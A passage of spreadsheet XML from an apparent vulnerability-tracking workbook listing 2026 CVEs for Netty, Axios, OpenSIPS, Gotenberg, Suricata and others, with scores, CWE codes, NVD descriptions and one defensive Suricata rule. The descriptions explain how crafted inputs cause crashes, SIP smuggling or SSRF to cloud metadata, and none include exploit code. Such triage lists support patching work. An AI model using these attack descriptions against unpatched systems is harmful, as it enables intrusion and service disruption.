          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42587</t>
        </is>
      </c>
    </row>
    <row r="2593">
      <c r="A2593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43003</t>
        </is>
      </c>
      <c r="C2593" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2593" s="5" t="inlineStr"/>
      <c r="F2593" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2593" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2593" s="5" t="inlineStr">
        <is>
          <t>openstack:ironic_python_agent</t>
        </is>
      </c>
      <c r="I2593" s="5" t="inlineStr">
        <is>
          <t>2026-05-01</t>
        </is>
      </c>
      <c r="J2593" s="5" t="inlineStr"/>
      <c r="K2593" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-829</t>
        </is>
      </c>
      <c r="L2593" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack ironic-python-agent 1.0.0 through 11.5.0. Ironic Python Agent (IPA) sometimes executes grub-install from within a chroot of the deployed partition image, leading to code execution in the case of a malicious image.</t>
        </is>
      </c>
      <c r="M2593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43003</t>
        </is>
      </c>
    </row>
    <row r="2594">
      <c r="A2594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44250</t>
        </is>
      </c>
      <c r="C2594" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2594" s="5" t="inlineStr"/>
      <c r="F2594" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2594" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2594" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2594" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2594" s="5" t="inlineStr"/>
      <c r="K2594" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2594" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive number of state objects and collections, leading to memory exhaustion and an OutOfMemoryError. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44250</t>
        </is>
      </c>
    </row>
    <row r="2595">
      <c r="A2595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44486</t>
        </is>
      </c>
      <c r="C2595" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2595" s="5" t="inlineStr"/>
      <c r="F2595" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2595" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2595" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2595" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2595" s="5" t="inlineStr"/>
      <c r="K2595" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201</t>
        </is>
      </c>
      <c r="L2595" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M2595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44486</t>
        </is>
      </c>
    </row>
    <row r="2596">
      <c r="A2596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44488</t>
        </is>
      </c>
      <c r="C2596" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2596" s="5" t="inlineStr"/>
      <c r="F2596" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2596" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2596" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2596" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2596" s="5" t="inlineStr"/>
      <c r="K2596" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2596" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Axios versions 1.7.0 through 1.15.x did not enforce configured request and response size limits when requests were sent with the fetch adapter. Applications that selected adapter: 'fetch', or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than maxContentLength or maxBodyLength despite those limits being explicitly configured. This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large data: URL, or when an application forwards attacker-controlled request bodies through axios while relying on maxBodyLength as a boundary. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M2596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44488</t>
        </is>
      </c>
    </row>
    <row r="2597">
      <c r="A2597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44496</t>
        </is>
      </c>
      <c r="C2597" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2597" s="5" t="inlineStr"/>
      <c r="F2597" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2597" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2597" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2597" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2597" s="5" t="inlineStr"/>
      <c r="K2597" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L2597" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie. The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M2597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44496</t>
        </is>
      </c>
    </row>
    <row r="2598">
      <c r="A2598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44673</t>
        </is>
      </c>
      <c r="C2598" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2598" s="5" t="inlineStr"/>
      <c r="F2598" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2598" s="5" t="inlineStr"/>
      <c r="H2598" s="5" t="inlineStr"/>
      <c r="I2598" s="5" t="inlineStr">
        <is>
          <t>2026-05-14</t>
        </is>
      </c>
      <c r="J2598" s="5" t="inlineStr"/>
      <c r="K2598" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2598" s="5" t="inlineStr">
        <is>
          <t>libyang is a YANG data modeling language library. Prior to SO 5.2.15, lyb_read_string() in src/parser_lyb.c contains an integer overflow that results in a heap buffer overflow when parsing a maliciously crafted LYB binary blob. An attacker who can supply LYB data to any libyang consumer (NETCONF server, sysrepo, etc.) can trigger a crash or potential heap corruption. This vulnerability is fixed in SO 5.2.15.</t>
        </is>
      </c>
      <c r="M2598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44673</t>
        </is>
      </c>
    </row>
    <row r="2599">
      <c r="A2599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44890</t>
        </is>
      </c>
      <c r="C2599" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2599" s="5" t="inlineStr"/>
      <c r="F2599" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2599" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2599" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2599" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2599" s="5" t="inlineStr"/>
      <c r="K2599" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2599" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's direct memory pool (OutOfDirectMemoryError), preventing legitimate connections from being processed. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44890</t>
        </is>
      </c>
    </row>
    <row r="2600">
      <c r="A2600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44893</t>
        </is>
      </c>
      <c r="C2600" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2600" s="5" t="inlineStr"/>
      <c r="F2600" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2600" s="5" t="inlineStr"/>
      <c r="H2600" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2600" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2600" s="5" t="inlineStr"/>
      <c r="K2600" s="5" t="inlineStr">
        <is>
          <t>CWE-703, CWE-805</t>
        </is>
      </c>
      <c r="L2600" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-haproxy prior to versions 4.1.135.Final and 4.2.15.Final, when decoding a PP2_TYPE_SSL TLV, HAProxyMessage.readNextTLV() first calls `header.retainedSlice(header.readerIndex(), length)` and only then reads the 1-byte client field and 4-byte verify field. If the attacker sets the TLV length below 5, the subsequent readByte/readInt throws IndexOutOfBoundsException. HAProxyMessageDecoder only catches HAProxyProtocolException around this call, so the IOOBE propagates and the retained slice on the pooled cumulation buffer is never released. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44893</t>
        </is>
      </c>
    </row>
    <row r="2601">
      <c r="A2601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45103</t>
        </is>
      </c>
      <c r="C2601" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2601" s="5" t="inlineStr"/>
      <c r="F2601" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2601" s="5" t="inlineStr"/>
      <c r="H2601" s="5" t="inlineStr"/>
      <c r="I2601" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2601" s="5" t="inlineStr"/>
      <c r="K2601" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2601" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions prior to 3.6.6 and 4.0.0-rc1, the TCP message framing layer parses the Content-Length header using unsigned int arithmetic with no overflow check. When an attacker sends a Content-Length value that overflows unsigned int (e.g., 4294967296), the framing layer computes a wrapped-around value (e.g., 0) and splits the TCP stream at the wrong boundary, causing the body of the first SIP message to be processed as a separate message and enabling SIP message smuggling. Because Content-Length is parsed in the transport layer before authentication, an unauthenticated, network-based attacker can smuggle arbitrary SIP messages over any TCP-based transport (proto_tcp, proto_tls, proto_ws, proto_wss) on any instance with TCP enabled, with no routing-script preconditions. This allows smuggled messages to bypass front-end SBC/proxy security policies, inherit the connection's authentication context, and evade rate limiting. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M2601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45103</t>
        </is>
      </c>
    </row>
    <row r="2602">
      <c r="A2602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45378</t>
        </is>
      </c>
      <c r="C2602" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2602" s="5" t="inlineStr"/>
      <c r="F2602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2602" s="5" t="inlineStr"/>
      <c r="H2602" s="5" t="inlineStr"/>
      <c r="I2602" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2602" s="5" t="inlineStr"/>
      <c r="K2602" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2602" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the identity-document verification admin UI embeds verification_attachment blobs through reusable signed Active Storage disk URLs, allowing anyone who obtains a URL to download the scanned document without an authenticated Decidim session until the signature expires. Verification-document images are rendered with variant_url(...), which produces signed /rails/active_storage/disk/... links instead of routing the file through an authorization-checking controller. Because Decidim configures Active Storage service URLs to remain valid for seven days, the URL itself becomes the credential for that period. The affected files are verification_attachment blobs on Decidim::Authorization, and the admin review pages embed those signed URLs directly into the HTML for pending and confirmation views. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M2602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45378</t>
        </is>
      </c>
    </row>
    <row r="2603">
      <c r="A2603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45416</t>
        </is>
      </c>
      <c r="C2603" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2603" s="5" t="inlineStr"/>
      <c r="F2603" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2603" s="5" t="inlineStr"/>
      <c r="H2603" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2603" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2603" s="5" t="inlineStr"/>
      <c r="K2603" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2603" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SslClientHelloHandler.decode() reads the 24-bit TLS handshake length and, when the ClientHello does not fit in the first record, eagerly allocates `ctx.alloc().buffer(handshakeLength)` (line 161). The guard at line 140 is `handshakeLength &gt; maxClientHelloLength &amp;&amp; maxClientHelloLength != 0`, and the commonly-used SniHandler/AbstractSniHandler constructors (SniHandler(Mapping), SniHandler(AsyncMapping), AbstractSniHandler()) pass maxClientHelloLength=0 and handshakeTimeoutMillis=0, so the length guard is disabled and no timeout is scheduled. A 16 MiB request exceeds the default pooled chunk size and becomes a huge/unpooled allocation performed immediately. The buffer is retained in the handler until the channel closes. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45416</t>
        </is>
      </c>
    </row>
    <row r="2604">
      <c r="A2604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45698</t>
        </is>
      </c>
      <c r="C2604" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2604" s="5" t="inlineStr"/>
      <c r="F2604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2604" s="5" t="inlineStr"/>
      <c r="H2604" s="5" t="inlineStr"/>
      <c r="I2604" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2604" s="5" t="inlineStr"/>
      <c r="K2604" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2604" s="5" t="inlineStr">
        <is>
          <t>Netatalk is a Free and Open Source file server suite for Unix-like operating systems. In versions 3.1.19 through 4.4.2, a stack-based buffer overflow exists in the deletedir() function of Netatalk's afpd daemon due to an integer underflow in the calculation of the remaining buffer size used for path construction. deletedir() is a utility function called when a file operation crosses a device boundary inside an AFP shared volume, which the standard library's renameat() cannot handle. The function attempts to prevent buffer overflows by tracking available space in a size_t remain variable. However, the arithmetic used to compute remain results in an unsigned integer underflow, causing the variable to become SIZE_MAX. Because of this, the subsequent boundary check always evaluates as safe, allowing an unbounded strcpy() operation to copy attacker-controlled filenames into a nearly full stack buffer. Version 4.4.3 patches the issue.</t>
        </is>
      </c>
      <c r="M2604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45698</t>
        </is>
      </c>
    </row>
    <row r="2605">
      <c r="A2605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45736</t>
        </is>
      </c>
      <c r="C2605" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2605" s="5" t="inlineStr"/>
      <c r="F2605" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2605" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2605" s="5" t="inlineStr">
        <is>
          <t>ws_project:ws</t>
        </is>
      </c>
      <c r="I2605" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="J2605" s="5" t="inlineStr"/>
      <c r="K2605" s="5" t="inlineStr">
        <is>
          <t>CWE-824, CWE-908</t>
        </is>
      </c>
      <c r="L2605" s="5" t="inlineStr">
        <is>
          <t>ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.</t>
        </is>
      </c>
      <c r="M2605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45736</t>
        </is>
      </c>
    </row>
    <row r="2606">
      <c r="A2606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45741</t>
        </is>
      </c>
      <c r="C2606" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2606" s="5" t="inlineStr"/>
      <c r="F2606" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2606" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2606" s="5" t="inlineStr"/>
      <c r="I2606" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2606" s="5" t="inlineStr"/>
      <c r="K2606" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="L2606" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. In 8.32.0 and earlier, the IsPublicIP function in pkg/gotenberg/outbound.go does not reject the 2002::/16 6to4 prefix, the 64:ff9b::/96 and 64:ff9b:1::/48 NAT64 prefixes, the fec0::/10 deprecated site-local prefix, Teredo, and other transition prefixes that can embed or route to non-public IPv4 destinations. The addr.Unmap operation only handles IPv4-mapped IPv6 addresses, so a crafted DNS AAAA record can cause the outbound HTTP client to treat an address wrapping an internal destination such as 169.254.169.254 as public. An unauthenticated attacker can use a conversion route with WithDenyPrivateIPs enabled to reach cloud metadata services, and the Chromium URL conversion route can return the internal response as a PDF, potentially exposing cloud credentials. Exploitation requires a deployment whose host routes the relevant IPv6 prefix, such as a dual-stack or NAT64-enabled environment. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M2606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45741</t>
        </is>
      </c>
    </row>
    <row r="2607">
      <c r="A2607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45742</t>
        </is>
      </c>
      <c r="C2607" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2607" s="5" t="inlineStr"/>
      <c r="F2607" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2607" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2607" s="5" t="inlineStr"/>
      <c r="I2607" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2607" s="5" t="inlineStr"/>
      <c r="K2607" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2607" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. From 8.10.0 until 8.33.0, the newContext function in pkg/modules/api/context.go starts one errgroup.Go goroutine for each multipart downloadFrom entry and allows those goroutines to concurrently write to the shared ctx.files, ctx.diskToOriginal, and ctx.filesByField maps and slices. Go maps and slices are not safe for concurrent mutation, so a crafted multipart request containing many downloadFrom entries can trigger a data race and terminate the process with a fatal concurrent map writes runtime error. The default configuration enables downloadFrom and disables authentication, allowing an unauthenticated remote attacker to crash an exposed conversion service and cause a denial of service. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M2607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45742</t>
        </is>
      </c>
    </row>
    <row r="2608">
      <c r="A2608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45747</t>
        </is>
      </c>
      <c r="C2608" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2608" s="5" t="inlineStr"/>
      <c r="F2608" s="5" t="inlineStr"/>
      <c r="G2608" s="5" t="inlineStr"/>
      <c r="H2608" s="5" t="inlineStr"/>
      <c r="I2608" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2608" s="5" t="inlineStr"/>
      <c r="K2608" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2608" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to version 7.0.16, the Lua TLS certificate information helper could dereference NULL certificate fields when a Lua script requested certificate information for TLS traffic where some certificate fields were absent. Crafted TLS traffic processed by a deployment using affected Lua TLS scripting could crash Suricata, resulting in denial of service. Version 7.0.16 contains a fix. As a workaround, avoid Lua scripts that call TLS certificate information helpers on untrusted traffic (`TlsGetCertInfo` function), or update scripts to handle missing certificate fields where possible.</t>
        </is>
      </c>
      <c r="M2608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45747</t>
        </is>
      </c>
    </row>
    <row r="2609">
      <c r="A2609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45759</t>
        </is>
      </c>
      <c r="C2609" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2609" s="5" t="inlineStr"/>
      <c r="F2609" s="5" t="inlineStr"/>
      <c r="G2609" s="5" t="inlineStr"/>
      <c r="H2609" s="5" t="inlineStr"/>
      <c r="I2609" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2609" s="5" t="inlineStr"/>
      <c r="K2609" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2609" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata could repeatedly perform expensive parsing of large HTTP `Content-Disposition` headers during HTTP response body processing. Crafted HTTP traffic could cause excessive CPU usage and denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, use a rule like `alert http1 any any -&gt; any any (sid: 1; http.request_header; content: "Content-Disposition:"; startswith; bsize: &gt; 8192; bypass;)`.</t>
        </is>
      </c>
      <c r="M2609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45759</t>
        </is>
      </c>
    </row>
    <row r="2610">
      <c r="A2610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45762</t>
        </is>
      </c>
      <c r="C2610" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2610" s="5" t="inlineStr"/>
      <c r="F2610" s="5" t="inlineStr"/>
      <c r="G2610" s="5" t="inlineStr"/>
      <c r="H2610" s="5" t="inlineStr"/>
      <c r="I2610" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2610" s="5" t="inlineStr"/>
      <c r="K2610" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2610" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata's IP defragmentation tracker lookup did not verify that an existing tracker used the same IP address family as the packet being processed. Under crafted fragmented IPv4/IPv6 traffic, an IPv6 fragment could be associated with an IPv4 defragmentation tracker. This can lead to a remote packet-triggered crash and denial of service when Suricata performs the relevant defragmentation. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, if using Suricata as an IDS with AF_PACKET, enabling AF_PACKET's `defrag` option may prevent Suricata from seeing such fragmented packets.</t>
        </is>
      </c>
      <c r="M2610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45762</t>
        </is>
      </c>
    </row>
